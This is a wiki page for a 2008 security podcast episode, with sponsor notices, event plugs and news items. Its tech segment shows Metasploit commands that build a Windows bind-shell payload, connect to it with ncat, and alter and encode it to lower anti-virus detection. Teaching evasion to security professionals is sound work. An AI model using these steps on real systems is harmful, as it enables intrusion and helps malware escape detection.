Episode125

From Security Weekly Wiki
Jump to navigationJump to search


Sponsors

Core Security

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, worlds best penetration testing tool.

Tenable Network Security

This podcast is also sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notibly the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins, and compliance checks” Tenable – Unified Security Monitoring!

Astaro

Astaro offers the most complete and easy to use Internet security appliances available. The products combine best of breed applications, the proven quality of Linux and enterprise level performance, providing the latest protection with the best total cost of ownership. All products are available as software, hardware or virtual appliances, which allows users the flexibility to meet a wide variety of deployment scenarios.

One of the best things about Astaro is that it offers its products completely free for home use. All enterprise features and all subscriptions, including virus scanning, web content filtering, email filtering and VPN clients, are available in the home license for no cost. All you have to do is visit www.astaro.com, register, download the software and obtain the key, which protects up to 10 IPs. There are no sales people to talk to, no payment information to enter—it’s just free. Again, visit www.astaro.com for more information or to download the product and free home user license.

Announcements & Shameless Plugs

Live from the PaulDotCom Studios Welcome to PaulDotCom Security Weekly, Episode 125 for September 30th, 2008

Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.

  • PaulDotCom SANS Click-Through - Go there, register for fabulous SANS training! Go now!
  • ICE (Integrated Cyber Exercise) - Oct. 1-3 at SANS Las Vegas! - Now featuring observers from the the Air Force Cyber Command (P), Air Force Information Operations Center and United States Air Force Warfare Center. Paul and Larry have Team names: The Steadfast Buccaneers and the The Network Ninja Assassins!
  • ChicagoCon - October 27 - November 1, Talks by Ed Skoudis, Gregory Conti West Point, Author of "Security Data Visualization", Daniel V. Hoffman CTO SMobile Systems, EH-Net Columnist, Billy Rios/John Walton Microsoft Pen Testers (Blue Hat)

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit 3.1-release Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

The above command produces a windows binary that listens on TCP port 6453 for a remote shell. You can access the remote shell using netcat as follows:

funnyhostname:~ pdc$ ncat 192.168.169.40 6453
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The payload generated above when uploaded to Virus Total only gets detected by 7 out of 36 anti-virus engines. If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:

"Reverse Engineering The Payload"

bash-3.2# strings payload.exe 
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.bss
.idata
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

Editing msfpayload to change the version string:

 
if (cmd =~ /^x/)
                note =
                        "PaulDotCom's Evil Payload\n" +
                        "Payload: " + payload.refname + "\n" +
                        " Length: " + buf.length.to_s + "\n" +
                        "Options: " + options + "\n"

The payload generated above when uploaded to Virus Total only gets detected by 6 out of 36 anti-virus engines. (Panda anti-virus relied on the Metasploit payload string in the binary).

Pass #3 - Metasploit (svn version as of 9-28-08) Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe

The payload generated above when uploaded to Virus Total only gets detected by 4 out of 36 anti-virus engines. However, it does not function in my testing, but does show how we can evade anti-virus systems.

Stories Of Interest

Faking passports the THC way - [PauldotCom] - Talk about identity theft! Why do governments not learn that RFID is not secure? Its wireless all over again, transmitting in the clear and using poor encryption. The defense here, get an RF shielding wallet and/or case to keep your RF enabled stuff in. Like, your credit card... [Larry] - vonJeek modified RFIDiot to clone e-passports to a 72 K smart card with incorrect information. It works because the sanity checking is apparently broken.

Linksys WRT350N unauthorized access - [PaulDotCom] -

HP Insight Diag remote exploit - [PaulDotCom] - Things that go bump? Not a lot of detail here, except that a "ential security vulnerability has been identified with HP Insight Diagnostics . The vulnerability could be remotely exploited to gain unauthorized access to files." In fact the referenced CVE has even less info!

Indirect iPhone forensics - [PaulDotCom] -

Rooting Phillips - [PaulDotCom] - Wow, stupid configuration issues, allow directory traversal attacks on a Phillips website